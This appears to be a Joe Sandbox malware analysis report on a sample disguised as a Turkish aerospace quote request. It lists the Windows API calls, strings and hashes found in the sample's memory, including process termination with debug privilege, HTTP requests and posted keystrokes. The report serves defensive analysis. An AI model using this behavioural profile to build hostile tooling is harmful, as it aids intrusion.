                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                    • Opcode ID: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                                                                                    • Instruction ID: ddcf3b1f50a67b3f0fac59644f2890aadbef0ec4b3f37e1fbc2bff158c06c182
                                                                                                                                    • Opcode Fuzzy Hash: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                                                                                    • Instruction Fuzzy Hash: C5A18F71701212CFCB29EF55C994B69F364BF06760F5442ADE80AAB261CB34ED16EF50
                                                                                                                                    APIs
                                                                                                                                    • EnumChildWindows.USER32(?,00FFA439), ref: 00FFA377
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                                    • Opcode ID: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                                                                                    • Instruction ID: ca9141afbb1ac5e68058d1e1bb2830ca266b0740c8a95c3b3e20d23e96058db5
                                                                                                                                    • Opcode Fuzzy Hash: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                                                                                    • Instruction Fuzzy Hash: 1291B7B1A0060ADACB08EF60C842BFEFB74BF04350F548119D95DA7261DF356959FBA1
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FA2EAE
                                                                                                                                      • Part of subcall function 00FA1DB3: GetClientRect.USER32(?,?), ref: 00FA1DDC
                                                                                                                                      • Part of subcall function 00FA1DB3: GetWindowRect.USER32(?,?), ref: 00FA1E1D
                                                                                                                                      • Part of subcall function 00FA1DB3: ScreenToClient.USER32(?,?), ref: 00FA1E45
                                                                                                                                    • GetDC.USER32 ref: 00FDCD32
                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FDCD45
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FDCD53
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FDCD68
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FDCD70
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FDCDFB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                    • String ID: U
                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                    • Opcode ID: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                                                                                    • Instruction ID: 2a0467de679854fee67b6ee4bc812221f5df14b0dbe190016389e5346b60ffe2
                                                                                                                                    • Opcode Fuzzy Hash: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                                                                                    • Instruction Fuzzy Hash: 9571A471900206DFCF319F64CC84AAA7BB7FF49360F18426BED955A255C7359C81EB90
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01011A50
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01011A7C
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01011ABE
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01011AD3
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011AE0
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01011B10
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 01011B57
                                                                                                                                      • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                                                                                      • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                                    • Opcode ID: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                                                                                    • Instruction ID: 55d240b1ef48634011a2a71b536a80d20b0c882d7d18e5df5d99e9ea534ccb3e
                                                                                                                                    • Opcode Fuzzy Hash: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                                                                                    • Instruction Fuzzy Hash: C641A3B1500209BFEB168F64CC89FFF7BACFF08354F104156FA859A149E7799A408BA0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0102F910), ref: 01018D28
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0102F910), ref: 01018D5C
                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01018ED6
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 01018F00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 560350794-0
                                                                                                                                    • Opcode ID: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                                                                                    • Instruction ID: 951e26c988f57dcba0c5b82ce2c07a59ea470626dbf83ab8655fad7348dd33b5
                                                                                                                                    • Opcode Fuzzy Hash: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                                                                                    • Instruction Fuzzy Hash: 7FF18A71A00209EFDF14DF98C884EAEBBB9FF49314F108099FA45AB255DB75AE41CB50
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0101F6B5
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F848
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F86C
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8AC
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8CE
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101FA4A
                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0101FA7C
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101FAAB
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101FB22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4090791747-0
                                                                                                                                    • Opcode ID: 3ba64a103cfbdd64140d5a29a78f9508aaae76639c0a07a3d18fcc18ca6e9d9c
                                                                                                                                    • Instruction ID: 686f18b159859a860dba05d8dd8fc2f1f06df0ad8caae30a9a07b3245834ae2a
                                                                                                                                    • Opcode Fuzzy Hash: 3ba64a103cfbdd64140d5a29a78f9508aaae76639c0a07a3d18fcc18ca6e9d9c
                                                                                                                                    • Instruction Fuzzy Hash: 89E1CF712043029FD714EF28C881B6ABBE1BF85354F18856DF8C58B2A6CB39EC45DB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                                                                                      • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
• lstrcmpiW.KERNEL32(?,?), ref: 01004D40
• _wcscmp.LIBCMT ref: 01004D5A
• MoveFileW.KERNEL32(?,?), ref: 01004D75
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010286FF
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FDC2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FDC319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FDC331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FDC34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FDC370
• DestroyIcon.USER32(00000000), ref: 00FDC37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FDC39C
• DestroyIcon.USER32(?), ref: 00FDC3AB
  • Part of subcall function 0102A4AF: DeleteObject.GDI32(00000000), ref: 0102A4E8
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 00FFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFA84C
  • Part of subcall function 00FFA82C: GetCurrentThreadId.KERNEL32 ref: 00FFA853
  • Part of subcall function 00FFA82C: AttachThreadInput.USER32(00000000,?,00FF9683,?,00000001), ref: 00FFA85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FF96AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FF96AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FF96D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FF96F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96FB
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FF853C,00000B00,?,?), ref: 00FF892A
• HeapAlloc.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8946
• GetCurrentProcess.KERNEL32(?,00000000,?,00FF853C,00000B00,?,?), ref: 00FF894E
• DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8961
• GetCurrentProcess.KERNEL32(00FF853C,00000000,?,00FF853C,00000B00,?,?), ref: 00FF8969
• DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF896C
• CreateThread.KERNEL32(00000000,00000000,00FF8992,00000000,00000000,00000000), ref: 00FF8986
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
APIs
  • Part of subcall function 00FF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
  • Part of subcall function 00FF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
  • Part of subcall function 00FF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
  • Part of subcall function 00FF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01019806
• _memset.LIBCMT ref: 01019813
• _memset.LIBCMT ref: 01019956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01019982
• CoTaskMemFree.OLE32(?), ref: 0101998D
Strings
• NULL Pointer assignment, xrefs: 010199DB
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
• Opcode ID: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
• Instruction ID: 05ae456b2acc661ba762162f66d90ded8761c7729de8546978293831f6e4c934
• Opcode Fuzzy Hash: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
• Instruction Fuzzy Hash: 33914771D00229EBDB10DFA5CC90EDEBBB9AF09750F20415AF519A7281DB75AA04CFA0
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01026E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 01026E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01026E52
• _wcscat.LIBCMT ref: 01026EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 01026EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 01026EF2
Strings
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
• Instruction ID: 2fd6813256b350b24433cd9e55ef0c07f2093da32bb578aa2dae33c1c89e5bec
• Opcode Fuzzy Hash: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
• Instruction Fuzzy Hash: 8F41A170900319EBEF219F68CC85FEE77F8EF08390F10046AF9C5A7291D67699848B60
APIs
  • Part of subcall function 01003C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01003C7A
  • Part of subcall function 01003C55: Process32FirstW.KERNEL32(00000000,?), ref: 01003C88
  • Part of subcall function 01003C55: CloseHandle.KERNEL32(00000000), ref: 01003D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9A4
• GetLastError.KERNEL32 ref: 0101E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0101EA63
• GetLastError.KERNEL32(00000000), ref: 0101EA6E
• CloseHandle.KERNEL32(00000000), ref: 0101EAA3
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
• Instruction ID: 348961450ca891f57e37b6f94e895883f3f6cdbc69f6b01e552be25b14dc9305
• Opcode Fuzzy Hash: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
• Instruction Fuzzy Hash: F941CE712002019FDB26EF14CC95F6EBBE5AF45314F588458FA829F2D6CBBDA804DB91
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 01003033
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
• Instruction ID: c4f4c100978cd1aa8c6e603fa05dcb4726524e89e426772a1ff0762bfcd29b09
• Opcode Fuzzy Hash: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
• Instruction Fuzzy Hash: A7114631249346BEF757CA19DC42D6F3B9CEF05360F10406EFE40AA1C2DA645A0046A0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01004312
• LoadStringW.USER32(00000000), ref: 01004319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100432F
• LoadStringW.USER32(00000000), ref: 01004336
• _wprintf.LIBCMT ref: 0100435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 01004357
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
• Instruction ID: 0fde3e72510e1534c5b68c354edb2f20e9d58da341cb7770b2a3d2476990d819
• Opcode Fuzzy Hash: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
• Instruction Fuzzy Hash: EF01A2F2900209BFE7719BA0DD89EEB777CEB08240F504095FB89E2041EA395E844B74
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• GetSystemMetrics.USER32(0000000F), ref: 0102D47C
